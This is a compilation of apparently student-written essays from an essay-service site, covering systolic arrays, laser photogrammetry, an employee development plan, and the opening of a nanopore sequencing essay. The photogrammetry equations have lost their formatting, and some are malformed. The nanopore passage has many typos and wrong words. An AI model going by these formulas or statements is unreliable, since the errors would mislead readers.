Systolic arrays are arrays of DPUs which are connected to a small number of nearest neighbour DPUs in a mesh-like topology. DPUs perform a sequence of operations on data that flows between them. Because the traditional systolic array synthesis methods have been practiced by algebraic algorithms, only uniform arrays with only linear pipes can be obtained, so that the architectures are the same in all DPUs. The consequence is that only applications with regular data dependencies can be implemented on classical systolic arrays. LikeSIMDmachines, clocked systolic arrays compute in “lock-step” with each processor undertaking alternate compute | communicate phases. But systolic arrays with asynchronous handshake between DPUs are calledwave front arrays. One well-known systolic array is CMU’s I Warp processor, which has been manufactured by Intel. An I Warp system has a linear array processor connected by data buses going in both directions.
· Super Systolic Array :
The super systolic array is a generalization of the systolic array. Because the classical synthesis methods (algebraic, i. e. projection-based synthesis), yielding only uniformDPUarrays permitting only linear pipes, systolic arrays could be used only to implement applications with regular data dependencies. By using simulated annealinginstead,Rainer Kresshas introduced the generalized systolic array: the super systolic array. Its application is not restricted to applications with regular data dependencies.
Applications:-
An application Example – Polynomial Evaluation
Horner’s rule for evaluating a polynomial is:
y= (…(((an*x+an− 1) *x+an− 2) *x+an− 3) *x+ … +a1) *x+a0
A linear systolic array in which the processors are arranged in pairs: one multiplies its input byxand passes the result to the right, the next addsajand passes the result to the right.

Expensive
Highly specialized for particular applications
Difficult to build

Systolic architectures are designed by using linear mapping techniques on regular dependence graphs (DG).

Regular Dependence Graph : The presence of an edge in a certain direction at any node in the DG represents presence of an edge in the same direction at all nodes in the DG.
DG corresponds to space representation no time instance is assigned to any computation t=0. • Systolic architectures have a space-time representation where each node is mapped to a certain processing element(PE) and is scheduled at a particular time instance.
Systolic design methodology maps an N-dimensional DG to a lower dimensional systolic architecture.
Mapping of N-dimensional DG to (N-1) dimensional

o systolic array is considered.
CONCLUSION:

A massively parallel processing with limited input output communication with host computer.
Suitable for many interactive operations.
Replace single processor with an array of regular processing elements
Orchestrate data flow for high throughput with less memory access a. Different from pipelining
Nonlinear array structure, multidirection data flow, each PE
may have (small) local instruction and data memory
Different from SIMD: each PE may do something different
Initial motivation: VLSI enables inexpensive special-purpose chips
Represent algorithms directly by chips connected in regular pattern

BIBLIOGRAPHY:-
* Text Book
· http://www.cs.nctu.edu.tw/~ldvan/teaching/vlsidsp/VLSIDSP_CHAP7.pdf
· http://eprints.iisc.ernet.in/6808/
· www.wikipedia.org

## Principles and Applications of Laser Photogrammetry

Laser Photogrammetry

Abstract

This paper will be explaining the working principles and applications of Laser Photogrammetry. Photogrammetry is a Greek word, “pho” meaning light and the photogrammetry meaning measuring with photographs. Thus, photogrammetry can be defined as a 3-dimensional coordinate measuring technique that uses photographs as the fundamental medium for measurement. It is an estimation of the geometric and semantic properties of objects based on images or observations from similar sensors. Traditional cameras, laser scanning and smart phones can be taken as examples of similar sensors. Measurements are made to give the location recognition, interpretation of an image or scenes. The technology has been used for decades to get information about an object from an image, for instance, autonomous cars need to get a better understanding of the object in front of them. The working principle is aerial triangulation in which photographs are taken from at least two different locations, lines of sight are developed from each camera to points on the object. This paper will mainly address the applications of laser photogrammetry. These applications include: recent advances of photogrammetry in robot vision; remote sensing applications and how the technology is aligned to photogrammetry; and the application of photogrammetry in computer vision and the relationships of photogrammetry and computer vision. The robotics application of photogrammetry is a young discipline in which maps of the environments are built and interpretations of the scene are performed. This is usually operated with small drones which give accurate results and updated maps and terrain models. Another application of photogrammetry is remote sensing. As its name indicates, remote sensing is done remotely without touching the object or scene. Remote sensors are used to cover large areas and where contact-free sensing is desired. For instance, there are objects which are not accessible, sophisticated or toxic to touch. Thus, remote sensors can be placed as far as satellites on orbits far away from the scene and photogrammetry plays an important role in interpretations of the scenes or objects. The third application of photogrammetry is in computer visions. In computer visions, the applications of photogrammetry that will be addresses in this paper include: image-based cartography, aerial reconnaissance and simulated environments.

Introduction

Photogrammetry means obtaining reliable information about physical objects and their environments by measuring and interpreting photographs. It is the science and art of determining qualitative and quantitative features of objects from the images recorded on photographic emulsions. Laser Photogrammetry and 3D Laser Scanning are completely different technologies for different project purposes. The 3D laser scanning, one is using a laser to measure each individual measurement detained, whereas when using photogrammetry, one is using a series of photographs with overlapping pixels to extract 3D information. Qualitative observations are identification of deciduous versus coniferous trees, delineation of geologic landforms, and inventories of existing land use, whereas quantitative observation are size, orientation, and position. Objects’ identification and description of objects are performed by observing the shape, tone and texture of the photographic image. The principal type of photographs used for mapping are vertical photographs, exposed with optical axis. This is illustrated in Figure1, geometry of a single vertical aerial photogrammetry. Vertical photographs, exposed with the optical axis vertical or as nearly vertical as possible, are the principal kind of photographs used for mapping [2]. In a vertical aerial photogrammetry, the exposure station of the photograph is known as the front nodal point of the camera lens. The nodal points are points in the camera lens system such that any light ray entering the lens and passing through the front nodal point will emerge from the real nodal point travelling parallel to the incident light ray [2]. So, the object side of the camera lens has the positive photograph, placed such that all points – the object point, the image point, and the exposure station lie on the same straight line [2]. The line through the lens nodal points and perpendicular to the image plane intersects the image plane at the principal point [2]. The distance measured from the rear nodal point to the negative principal point or from the front nodal point to the positive principal point is equal to the focal length f of the camera lens [2].

If you need assistance with writing your essay, our professional essay writing service is here to help!
Essay Writing Service

The ratio between an image distance on the photograph and the corresponding horizontal ground distance is the scale of an aerial photograph [1]. For a correct photographic scale ratio, the image distance and the ground distance must be measured in parallel horizontal planes [1]. However, this condition does not occur because most photographs are tilted and the ground surfaces are not flat horizontal planes. As a result, scale will differ throughout the format of a photograph, and the photographic scale can be defined only at a point, and is given by equation 1 [1].  Equation 1 is used to calculate scale on vertical photographs and is exact for truly vertical photographs [1].

S= fH–h
(1)

where:

S= photographic scale at a point

f = camera focal length

H= flying height above datum

h= elevation above datum of the point

Figure 1: Geometry of a vertical aerial photogrammetry [2]

When calculating, flight planning, approximate scaled distances are adequately enough for direct measurements of ground distances. Average scale is found by using equation 2 [1].

Save=f(H–have)
(2)

where
have
is the average ground elevation in the photo. Referring to the vertical photograph shown in the Figure 2 below, the approximate horizontal length of the line AB is given by equation 3 [1].

D≅d(H–have)f
(3)

Where

D= horizontal ground distance

d= photograph image distance

Figure 2: Horizontal ground coordinates from single vertical photograph [1]

Again, to get an accurate measurement of the horizontal distances and angles, the scaled variations caused by elevation differences between points must be considered [2].

Horizontal ground coordinates are calculated by dividing each photocoordinate by the true photographic scale at the image point [2]. In equation form, the horizontal ground coordinates of any point are given by equation 4.

Xp=xp(H–hp)f
(4)

Yp=yp(H–hp)f

where

Xp
,
Yp
= ground coordinate of point p

xp
,
yp
= photocoordinate of point p

hp
= ground elevation of point p

Equation 4, uses a coordinate system defined by the photocoordinate axes having an origin at the photo principal point and the x-axis typically through the midside fiducial in the direction of flight [2]. Then the local ground coordinate axes are placed parallel to the photocoordinate axes with an origin at the ground principal point [2]. These equations are exact for truly vertical photographs and are typically used for near vertical photographs. After the horizontal ground coordinates of points A and B in Figure 2 are computed, the horizontal distance is given by equation 5.

DAB= [(Xa–Xb)2+ (Ya–Yb)2]0.5
(5)

The elevations
ha
and
hb
must be known before the horizontal ground coordinates can be calculated [2]. If stereo solution is used, there is no need to know the elevations
ha
and
hb
[2]. The solution given by equation 5, is not an approximation because the effect of scale variation caused by unequal elevations is included in the computation of the ground coordinates [2].

Another characteristic of the perspective geometry recorded by an aerial photograph is relief displacement. Relief displacement is evaluated when analyzing or planning mosaic or orthophoto projects [4]. Relief displacement can also be used to interpret photo so that heights of vertical objects are obtained. [4]. This displacement is shown in Figure 3, and is calculated by equation 6 [2].

d=d(H–hbase)rtop
(6)

where:

d= image displacement

r= radial distance from the principal point to the image point

H= flying height above ground

Since the image displacement of a vertical object can be measured on the photograph, Equation 6 can be solved for the height of the object to obtain the vertical height of the object,
ht
which is given by equation 7.

ht= d(H–hbase)rtop
(7)

where:

hbase
= elevation at the object base above datum

Figure 4: Relief Displacement on a Vertical photograph [1]

All photogrammetric procedures are composed of these two basic problems, resection and intersection. There are photogrammetric problems which are solved by Analog and Analytical solutions. Resection is the process of recovering the exterior orientation of a single photograph from image measurements of ground control points [4]. In a spatial resection, the image rays from total ground control points (horizontal position and elevation known) are made to resect through the lens nodal point (exposure station) to their image position on the photograph [4]. The resection process restores the photograph’s previous spatial position and angular orientation, that is when the exposure was taken. Intersection is the process of photogrammetrically determining the spatial position of ground points by intersecting image rays from two or more photographs [4]. If the interior and exterior orientation parameters of the photographs are known, then conjugate image rays can be projected from the photograph through the lens nodal point (exposure station) to the ground space. Two or more image rays intersecting at a common point will determine the horizontal position and elevation of the point. Map positions of points are determined by the intersection principle from correctly oriented photographs. The Analog solution is one of the methods of solving these fundamental photogrammetric problems. The Analog solutions use optical or mechanical instruments to form a scale model of the image rays recorded by the camera [2]. However, the physical constraints of the analog mechanism, the calibration, and unmodeled systematic errors limit the function and accuracy of the solution [4]. The analytical photogrammetry solution is the second solution that employs mathematical model to represent the image rays recorded by the camera [2]. The collinearity condition equations include all interior and exterior orientation parameters required to solve the resection and intersection problems accurately [2]. Analytical solutions consist of systems of collinearity equations relating measured image photocoordinates to known and unknown parameters or the photogrammetric problem [4].

Working Principles of Photogrammetry- Aerotriangulation

Aerial triangulation is defined as the process of determining x,y and z ground coordinate of individual points on measurements from the photograph [4]. The aerotriangulation geometry along a strip of photography is illustrated in Figure 6 [4]. Photogrammetric control extension requires that a group of photographs be oriented with respect to one another in a continuous strip or block configuration [4]. A pass point is an image point that is shared by three consecutive photographs (two consecutive stereomodels) along a strip. The exterior orientation of any photograph that does not contain ground control is determined entirely by the orientation of the adjacent photographs. Benefits of Aerial Benefits include: minimizing delays and hardships due to adverse weather condition; access to much of the property within the project area is not required; field surveying in difficult area, such as Marshes, Extreme slope, hazardous rock formation, etc; can be minimized. Aerial Triangulation is classified three categories:

Photogrammetric projection method (analogic or analytical) [4].

Strip or block formation and adjustment method (sequential or simultaneous) [4].

Basic unit of adjustment (strip, stereomodel, or image rays) [4].

Figure 6. Aerotriangulation geometry

Application of Photogrammetry

Robot vision

Robot vision systems are an important part of modern robots as it enables the machine to interact and understand with the environment; and to take necessary measurements. The instantaneous feedback from the vision system which is the main requirements of most robots is achieved by applying very simple vision processing functions or/and through the hardware implementation of algorithms [3]. One of the examples of this application is called close-range photogrammetry which is used in time-constrained modes in robotics and target tracking [3].

Photogrammetry and Remote Sensing Applications

Remote sensing collects information about objects and features from imagery without touching them. It is mainly used to collect and derivate 2D data from all types of imagery, for instance slope.  Photogrammetry is associated with the production of topographic mapping generally from conventional aerial stereo photography [5]. Today photographs are taken high-precision aerial cameras, and most maps are compiled by stereophotogrammetry methods. The advantage of Aerial Photogrammetry and Topographic Mapping is that it is cost effective when ground survey methods could not cover large areas. The map shows land contours, site conditions and details for large areas. The conventional aerial photography can produce an accurate mapping at scales as large as 1:200. The accuracy is achieved by employing improved cameras and photogrammetric instrumentations.

Our academic experts are ready and waiting to assist with any writing project you may have. From simple essay plans, through to full dissertations, you can guarantee we have a service perfectly matched to your needs.
View our services

After an area has been authorized for mapping, the planning and procurement of photography are the first steps in the mapping process. The necessary calculations are made on a flight design worksheet. The flight planned chooses the best available basement on which to delineate the design flight lines. The final plan gives the location, length, and spacing of flight strips.

Computer Visions

The goals of Computer Visions are for object recognition, navigation, and object modeling. Today’s Object recognition algorithms function according to the data flow shown in the Figure 7 below. Image features are extracted from the image intensity data such as: regions of uniform intensity, boundaries along high image intensity gradients, curves of local intensity maxima or minima (line features), and other image intensity events defined by specific filters(corners) [4,6]. In order to get high level measurements, these features are processed further. For instance, part of a step intensity boundary may be approximated by a straight-line segment and the properties of the resulting line are used to define the boundary segment. Formation of a model for each class is the next step in recognition, in which the algorithms store the feature measurements for a particular object, or a set of object instances for a given class, and then use statistical classification methods to classify a set of features in a new image according the stored feature measurements [4,6]. The second goal of the computer visions is the navigation modelling. The goal of navigation is to provide guidance to an autonomous vehicle. The vehicle is to maintain accurate following along a defined path. In the case of a road, it is desired to maintain a smooth path with the vehicle staying safely within the defined lanes. In the case of off-road travel, the vehicle must maintain a given route and the navigation is carried out with respect to landmarks [6]. The third object of computer visions is object modeling. In object modelling, a complete and accurate 3D model of an object is recovered [6]. The model can then be used for different applications, such as: to support object recognition, and for image simulation. In image simulation, the image intensity data is projected onto the surface of the object to provide realistic image of the object from any desired viewpoint [6]. Computer vision methods is also used for defect detection assessment and is illustrated in Figure 8. Figure 8 shows that the general computer vision pipeline starting from low-level processing up to high-level processing. Correspondingly, the bottom part of Figure 8 labels specific methods for the detection, classification and assessment of defects on civil infrastructure into pre-processing methods, feature-based methods, model-based methods, pattern-based methods, and 3D reconstruction [6]. These methods, however, cannot be considered fully separately. Rather they build on top of each other. For example, extracted features are learned to support the classification process in pattern-based methods [6].

Figure 7: The operational structure of object recognition algorithms.

Figure 8: Categorizing general computer vision methods (top) and specific methods to defect

detection, classification and assessment of civil infrastructure.

Future Innovations and Developments

These days, close range photogrammetry uses digital cameras with capabilities that will result in moderate to very high accuracies of measurement of objects. To improve robot’s vision capabilities, two alternatives are suggested and studied for future: (a) hardware implementation of more complex image analysis functions with consideration of photogrammetric methodology, or (b) design of a robot “insect-level” intelligent system principle, based on the use of a great variety of different, simultaneous, but simple sensor functions [3]. In computer visions, the long-term goal of computer vision with respect to aerial reconnaissance applications is change detection [6]. In this case, the changes from one observation to the next are meant to be significant changes, that is, significant from the human point of view [6]. Thus, in order to define only significant change, it is essential to be able to characterize human perceptual organization and representation.

Conclusion

When one is looking to deploy one technology over the other for a given project purpose, it is a question of how large an area is required to be collected and how accurately it needs to be collected. Photogrammetry can easily help us to acquire large scale data, has ability to record dynamic scenes, records images to document the measuring process and can automatically process data, possibly for real-time processing. The disadvantages of photogrammetry are: the necessity of light source, the flaws in measurement accuracy, and the occlusions and visibility constraints. The performance of photogrammetry can be improved by using computer simulations which is more automatic to be deployed on places which are difficult to operate. The enormous contribution to heritage conservation cannot be overstated since photogrammetry is particularly preferred for monitoring purposes, like construction sites.

Works Cited

Hamilton Research Group. “Chapter 10: Principles of Photogrammetry.” In Physical Principles of Remote Sensing (3rd Edition). Cambridge University Press, New York, 2013 441pp.

Lillesand, Thomas M, et al. Remote Sensing and Image Interpretation. 6th ed., John Wiley & Sons, 2008.

Gruen, Armin. (1992). Recent advances of photogrammetry in robot vision. ISPRS Journal of Photogrammetry and Remote Sensing. 47. 307-323. 10.1016/0924-2716(92)90021-Z.

Linder, Wilfried. Digital Photogrammetry: A Practical Course. Springer Berlin Heidelberg, 2009. INSERT-MISSING-DATABASE-NAME, INSERT-MISSING-URL. Accessed 2018.

CICES. “Photogrammetry and Remote Sensing.” Chartered Institution of Civil Engineering Surveyors, www.cices.org/.

A. Heller and J.L. Mundy. The evolution and testing of a model-based object recognition system. In Computer Vision and Applications, R. Kasturi and R. Jain, eds, IEEE Computer Society Press., 1991.

## Employee Development Plan: Importance and Applications

Employee Development Plan
Abstract
With the nation’s economic turmoil still lingering it is more important than ever to develop plans that will encourage employees to remain with the company. Employee turnover is a crucial issue when it comes to the current economic standing of America. Each time an employee leaves the company the company loses the money it spent training and developing that employee for the future with the company. The training, classes, and cross skills the company has invested in the employee then benefit the new company. Because this situation costs the company money, a new employee development plan has been designed in the hopes of improving employee retention rates in the future.

If you need assistance with writing your essay, our professional essay writing service is here to help!
Essay Writing Service

Employee development allows for the development of the employee so that they can better equip themselves for their career choices. It is important to support their desire to develop more fully at work, while at the same time not investing money that walks out the door and to the competition. This design allows the company to support and assist the employee desire to develop in career skills and to feel that the company supports the loyalty he or she has shown by years of service while encouraging education as well as cross training. The organizational consultant, per the research information and plan, challenges the organization to embrace the detailed plan to further develop each valuable employee. No matter what, organizational leaders must see the value in employee development and be willing to make the effort to show loyalty to its employees.
Employee Development Plan
With the nation’s economic turmoil still lingering it is more important than ever to develop plans that will encourage employees to remain with the company. Each time an employee leaves the company the company loses the money it spent training and developing that employee for the future with the company. The training, classes, and cross skills the company has invested in the employee are then benefiting the new company. Because this situation costs the company money, a new employee development plan has been designed in the hopes of improving employee retention rates in the future.
Ebbert Hubbard, the prominent American philosopher and writer, once said, “One machine can do the work of 50 ordinary men, but no machine can do the work of one extraordinary man” (Goldstein, 2003). His statement seems to be more pertinent than ever in the contemporary context of commuting from organizations focused on tangible assets like land or property to organizations relying on intangible assets such as creativity, knowledge, or problem solving. Statistics show that more than 50% of the Gross Domestic Product generated by developed economies is based on knowledge—information technology (IT), education, and pharmaceuticals being the key sectors that account for the impressive percentage (www.yourpeoplemanager.com). This means that humans have become the major resource for modern companies. Consequently, their development and education are the major levers conditioning the organizational growth. For that, leaders must understand the value of their employees and develop them for organizational and employee benefit. This research defines employee development and addresses why organizational leaders need it. The research proves the link between employee development and company growth while sharing the benefits of employee training and development. Then the research outlines a plan that addresses hiring, training, development based on time, promotion, and education. Lastly, the conclusion calls leaders to action to realize the importance of, and build the plan for, developing their employees.
What is employee development and why do we need it?
Before starting to analyze the correlation between these two aspects, a clear picture of what employee training and development mean could prove extremely useful. First, a clear delimitation should be made among three concepts that people often confuse. These are education, training, and development. The first one consists of preparing an individual’s mind in a framework that is different from the organization. The second refers to attending courses aimed at improving skills, knowledge or attitudes for appropriately achieving a certain task within an organization, while the third is the natural result of the first two and is represented by the growth of the individual in terms of ability, understanding and awareness (www.accel-team.com). This triangle proves to be indispensable to company performance as it allows employees to account for more tasks that are difficult. In addition, it accommodates newcomers to the organization’s performance standards and helps them act within the same competitive pattern responsible for the company’s success. Further, it enhances the organization’s efficiency and effectiveness, it responds to legislative requirements regarding health or safety, and sets an adequate framework for informing employees on changes that have been made and the courses they have to attend in order to cope with modifications.
Detecting the personnel’s needs requiring employee training and development programs is very difficult. However, task as managers can rely on various sources such as common sense (for instance, the implementation of new technologies undoubtedly represents a solid reason for training) and negative aspects that statistics reveal (the decrease of output per employee, lower performance indices, behavioral problems like absences, sickness, lateness etc.). Furthermore, government recommendations, predictions, specialists’ advice, alarm triggers pulled by specialized journals or confessions made by other organizations which have encountered a certain problem also are other sources on which task managers can rely.
Training and development may be achieved in both formal and informal ways. The former category implies attending courses held by internal or external managers who usually combine impersonal lectures with interactive activities like role-playing or simulation, forums, tests, case studies presented with the help of video and computers. The latter category is a non-official one, and is mainly based on the employees’ ability to draw their own conclusions after observing other workers, participating in meetings, rotating jobs within the organization or temporary assisting employees from another company, autodidactic teaching by reading texts or viewing video tapes, being a member of a research team and so on (www.accel-team.com).
Measuring the outcome of such training and development initiatives is a very difficult thing to do because results are rather qualitative than quantitative. Still, managers may observe if the effectiveness and efficiency of their employees have increased by analyzing the number of customer complaints or the time in which a certain task has been performed. They can also notice a faster accommodation of new employees, more effective use of machinery, a higher job satisfaction reflected in performing more qualitative services to the client (and thus attracting new customers), fewer accidents etc. Managers can also draw some conclusions concerning the employees’ loyalty or the improvement of their qualification allowing them to contribute to tougher tasks or other positions within the organization (www.accel-team.com).
Researches proving the link between employee development and company growth
Undoubtedly, employee development has a significant impact on the customers’ satisfaction and the employees’ ability and willingness to solve crisis encountered by the organization or to adapt to changes occurred in the business environment. Through training and development, a company’s personnel may gain the necessary expertise for approaching new markets or technologies, thus inducing cost savings in the end. Additionally, employees value trainings because these are seen as strategic investments that the organization accepts to make because of the huge trust it has in its personnel’s potential. Therefore, employees will embrace a positive and enthusiastic attitude towards the organization concerned about their intellectual evolvement and will work harder for helping it achieve its mission and goals (Gross, 2000).
The link between employee satisfaction, customer satisfaction, and financial performance has also been outlined by AC Nielsen through its market researches or by Sears through surveys carried out on its retail stores (Goldstein, 2003). Another research survey, carried out by Sirota, Mischkind, and Meltzer (2005), on a sample of 2.5 million employees, highlighted that companies boasting high morale had the tendency to outperform competitors. Moreover, the research emphasized that out of 28 companies having almost 920,000 employees, the share price of 14 (known as high morale firms), had an average increase of 16% in 2004, while the share price of 6 (known as low morale firms) had an average increase of only 3%. The results were significant when compared with the industry average of 6%, calculated for 9,240 companies (http://knowledge.wharton.upenn.edu). In conclusion, higher morale and enthusiasm lead to increased financial performances. As employee development and training are said to be rewards boosting the personnel’s positivism and satisfaction, they may be considered inherently linked to company growth.
Benefits of employee training and development
A major benefit of employee development is increased productivity. Because of the courses he or she attends, an employee may learn advanced techniques that lead to higher efficiency and effectiveness in performing tasks. For instance, if a company’s bookkeeper is sent to an Excel course, this will be taught several shortcuts that will help him or her comply faster with his job requirements. On one hand, this means that he or she can perform other activities that would have otherwise required hiring new employees, and spending more money. On the other hand, increased efficiency results in prompt accountancy reports and ledgers that may be timely consulted by managers in order to make operative decisions. This means shorter time, and consequently, less money spent.
A second benefit of employee development refers to reducing turnover. Researches that have been carried out with regard to this issue have emphasized that an employee’s trajectory within an organization has the form of a parabola. In the beginning, he is enthusiastic about his new job and learns everything he needs in order to live up to the company’s expectations and gain recognition for his well-done work. This ascending trend (or honeymoon as Sirota calls it) lasts five or six months until the individual reaches a climax where routine comes into the limelight. Thus, he continues to do his job for a certain period, but as nothing new appears, the employee decides to leave the company and try something different or look for another challenge. Yet, Sirota’s (2005) research shows that 10% of the companies surveyed succeed in ensuring a prolonged honeymoon throughout the entire career to their employees because they understand the difficulty of “being enthusiastic about an organization that is not enthusiastic about you” (http://knowledge.wharton.upenn.edu). Consequently, they implement development programs that help employees seize opportunities and prepare for complex tasks that might reveal numerous latent skills or abilities. Additionally, employee development may be presented as a supplementary path to job security that has become a top need after the collapse of high-tech companies and September 11, 2001. A perfect example of a high-morale company in these terms is Southwest Airlines, which, after the terrorist attacks in September, stated: “We will take a hit in our stock price and not lay off anybody” (http://knowledge.wharton.upenn.edu).
Furthermore, training and development can exert a positive influence in the recruiting process. First, managers may wish to hire an elitist who does not correspond to job requirements because of a certain skill. If the company is ready to offer trainings for developing the missing feature, it could win a valuable employee who may be responsible for future performances. The following is an example: A person applying for the PR executive position may be rejected because he or she does not correspond to a single requirement such as updating the company’s website. Although he or she is a performer and a fast learner, the organization prefers to hire a less brilliant candidate who poorly meets all the requirements instead of investing some courses in the first one. Such a decision may greatly affect the company’s performance and image.
Secondly, development programs may prove enticing enough to potential employees. Therefore, the company can use them in order to attract the desired staff capable of inducing the organization’s growth. Thirdly, if existing employees are trained for different or more complex tasks, these may become eligible for vacant positions or may handle a wider range of activities. In this context, the company saves money by reducing its need to hire. Fourthly, development consists of rewarding loyal employees who after learning new skills are promoted to higher positions. This also accounts for a company’s performance. Lastly, development strategies allow employees to be more independent or, in other words, they give them wings to fly. This autonomy cuts off the supervision costs, thus increasing the company’s efficiency, and inherently, performance (Gross, 2000).
Employee training also plays a major part in maintaining a work/life balance. This is essential for the organization’s health because the employee burnout phenomenon can decrease productivity or can have other negative consequences like: sickness, lateness, absenteeism as a result of the unusual stress; lower efficiency and morale because of their exaggerate workload; higher turnover rates. Consequently, employees should be helped to handle both work and life commitments through trainings teaching them how to better manage time and priorities or how to recharge batteries after projects or seasons involving an unusual amount of work. In response to the company’s concern, an employee may prove unexpectedly grateful and may voluntarily contribute to a future project, essential to the organization’s success (Gross, 2000).
Employment Development Plan
Hiring
The first step to employee development is the hiring process. When there is an opening the department head will meet with human resources and determine exactly what the new job requirements will be. In addition, at this time there will be a discussion about where the position may lead in the future and what type of education or skills will be important to have for the path to be followed (Bass, 1985). Hiring in the future will involve a careful screening of applicants to cull the most qualified for the particular position in question. In the past, it has been accepted as a practice to hire the first one who was qualified in order to get the position filled. In the future, this will change and improve the retention rate of employees to the company. The applicants will be carefully examined so that the candidate who is most likely to advance within the company is selected. Hiring will happen by way of Internet sources, employee referrals, recruiters, and job fairs. When an opening occurs it will be publicized in several publications so that the company will have a diverse applicant pool from which to select those who will be interviewed (Steines and Kleiner, 2003).
Training
Employee development is an expensive process. The company invests funds to train the employee, and then further train and then possibly invest in the employee’s college education as well. All of this is done with the hopes that the company will eventually reap the benefits of the investments made on the employee’s behalf (Liggett, 2007). The company’s employee development plan has changed to be more cautious about fund investments at the front end of the employee history with the company, but on the back end as time moves forward, the benefits are increased from previous years. When an employee is first hired, there will be a three-day training period by which the employee will view the videos and company policies, be given tours of the company, and will engage in a discussion about future possibilities. After the three days have passed, the employee will begin working along side someone in their chosen department who will assist with their acclimation (Liggett, 2007). While this will cost time and money because the training or supervising peer will have to slow down their own work when the new employee needs help, it is still less expensive than paying for the new employee to spend time in a training institution. The training will initially for nothing more than the job the employee was hired to do. At the first three-day session however, the employee will be told of the entire development package so the employee has an understanding of what the future holds and what staying with the company can mean to them. There will also be an employee suggestion box outside the cafeteria from which ideas for development will be read and discussed quarterly (Liggett, 2007).
Development based on time
The entire foundation of this employee development plan is to reward employees for loyalty and longevity. The plan is based on a staggered schedule that allows the company to provide the best benefits for those who stay with the company (Redling, 2003). The reward is incentive for employees to remain in the employ of the company while offering the company some security that it is investing in long-term workers. It also reduces the loss of funds that occur when a short-term employee goes to a competitor after receiving training at this company. Because the company’s new policy is operated with the bulk of the benefits on the back end of employment they must be made better than they were before so that employees want to stay and reap the rewards of the new package.
After six months of employment the employee may request for a cross training package to be started. In this package, the employee will be trained in other departments so that he or she can work throughout the company in several different capacities. The company will provide a temporary worker to perform the employee’s duties while the employee is cross training for the other department (Redling, 2003). Each six months the employee will be encouraged to choose another department that he or she wishes to be cross trained for and the company will provide an temporary worker so that the employee can devote a full forty hour week to the business of learning the new skill. There will be no limit on the number of departments an employee can be cross trained in as long as there are at least six months worked at the regular position between training sessions. This allows the employee to develop their skills as well as provides additional back up support for the company because the employee can handle multiple tasks within the company (Redling, 2003).
Promotion
It is important that an employee feel they are being treated well and given opportunities to advance in their careers (Solomon, 2002). Any time there is an opening the company employees shall have the first opportunities to apply for it. If there is an employee who is qualified, that employee shall be given the job and the hiring will focus on replacing him or her in the old position.
Education
After one year of employment with the company, the employee can apply for the education package. This will allow the company to reimburse for some costs of education. In years two through four of employment the company will reimburse the cost of tuition following the receipt of a report card that demonstrates a C average in the classes attempted. The classes can be based on any subject but there will be a one hundred percent reimbursement for classes pertaining to work and a seventy five percent reimbursement for classes that do not pertain to the industry. During years five through ten the company will reimburse at one hundred percent not only the cost of the tuition but also the cost of the books for any classes the employee chooses to take. The employee simply needs to provide a report card at the end of the semester to receive reimbursement.
From years ten to 15 not only will the company pay for the employee college but will allow the employee to attend during the work day without docking the pay. This will work up to two hours a day for the duration of employment.
The employment development plan not only allows for the development of an employee in the area of training but also in staff development. The managers of the company will attend annual seminars on staff relations so that they can better understand how to communicate with their subordinates (Dowling, 2001). The company wants to focus on employee retention and part of the reason employees choose to stay with a company or leave it for greener pastures is because they do or do not get along well with their superiors. Staff development and relations is an important aspect of employee development and annual staff relation seminars are targeting problem communications so that the employee will continue to feel loyal to the company.
Conclusion
Employee development can serve to save funds that the company would otherwise have to write off. Employee turnover is a crucial issue when it comes to the current economic standing of America. Employee development allows for the development of the employee so that they can better equip themselves for their career choices. It is important to support their desire to develop more fully at work, while at the same time not investing money that walks out the door and to the competition. This design allows the company to support and assist the employee desire to develop in career skills while at the same time discouraging a cash loss. If the employee stays with the company the development program risks very little of the company’s assets before the employee has proved themselves a long-term investment. This plan allows the employee to fully develop and to feel that the company supports the loyalty he or she has shown by years of service while encouraging education as well as cross training. The organizational consultant, per the research information and plan, challenges the organization to embrace the detailed plan to further develop each valuable employee. No matter what, organizational leaders must see the value in employee development and be willing to make the effort to show loyalty to its employees.
References
Bass, B. M. (1985). Leadership and Performance Beyond Expectations. New York, NY: Free Press.
Dowling, F. (2001). “Just the Job: Bosses need work on staff relations.” Birmingham Post. January 6, 22 pp.
Function 7: Employee education, training, and development. (2006). [Online], Available:http://www.accel-team.com/human_resources/hrm_07.html (2008, January 30).
Giving Employees What They Want: The Returns Are Huge. (2005). [Online], Available: http://knowledge.wharton.upenn.edu/article.cfm?articleid=1188&CFID=3898075&CFTOKEN=53249968 (2008, January 30).
Goldstein, S. (2003). “Employee Development: An examination of service strategy in a high-contact service environment.” Production and Operations Management. Summer.
Gross, B. (2000). Effective Training Programs for Managers, [Online], Available: http://www.allbusiness.com/human-resources/careers-job-training/2975408-3.html (2008, January 30).
Helping Employees Maintain Work/Life Balance. (2006). [Online], Available: http://www.allbusiness.com/human-resources/employee-development-employee-productivity/1242-1.html (2008, January 30).
Liggett, D. (2007). “Training and qualifying your employees.” Industry Applications Magazine. May, Vol. 13, Issue 3. pp.25-30.
Redling, R. (2003). “Assembling a solid staff: Job rotation, job shaping and cross training help employee retention.” Connexion/Medical Group Management Association. March, Vol. 3, pp. 38-40.
Sirota, D., L. Mischkind, and Michael Meltzer. (2005). The Enthusiastic Employee: How Companies Profit by Giving Workers What They Want. University City, PA: Wharton School Publishing.
Steines, S. R., and B. H. Kleiner. (2003). “Keys to Hiring Employees Effectively.” Management Research News. Volume 26, Issue 2/3/4, pp. 170-180.
Solomon, M. (2002). “Discovering the Leader Within.” Computerworld. August 5, 38 pp.
YPM Briefing: Employee development. (2005). [Online], Available: http://www.yourpeoplemanager.com/YarBGXpoTX_-WA.html (2008, January 30).

## Nanopore Sequencing: Structure, Principles and Applications

Nanopore Sequencing

The underlying force behind the rapid advancements in genomics is due to the development of novel genome sequencing. It is said notably that the invention of second generation sequencing gave scientists and other inventors the necessary throughput and costeffectiency to sequence thousands of genomes whcich were in the past was deemed to be feasible. In the resent past it gave was a dawn of what can be considered as a third generation. This third generation allows amplification free reading od DNA molecules in consective long stretches. This advent of new generation is defeated by two other methods.

Nanopore sequencing and single molecule real time sequencing (SMRT)

Oxford Nanopore Technologies (ONT)

Nanopore sequencing is the current easier way to demonstrate the sequencing methodology. A single small pore is inserted when the elctrical potential is appied across an insulating membrane. From the pore the DNA strand is pulled and the current from the passing base conbinations infers the sequence. In the year 1989, David Deamer came up with a rough sketch about this concept and the implementation of this concept took almost two decades.

Principle Behind Nanopore Sequencing

The main principle behind the nanopore sequencing: Minion Nanopore Sequencing uses a very basic principle; the strands of DNA or Nucleotide bases are driven into a nanopore electrophoretically.

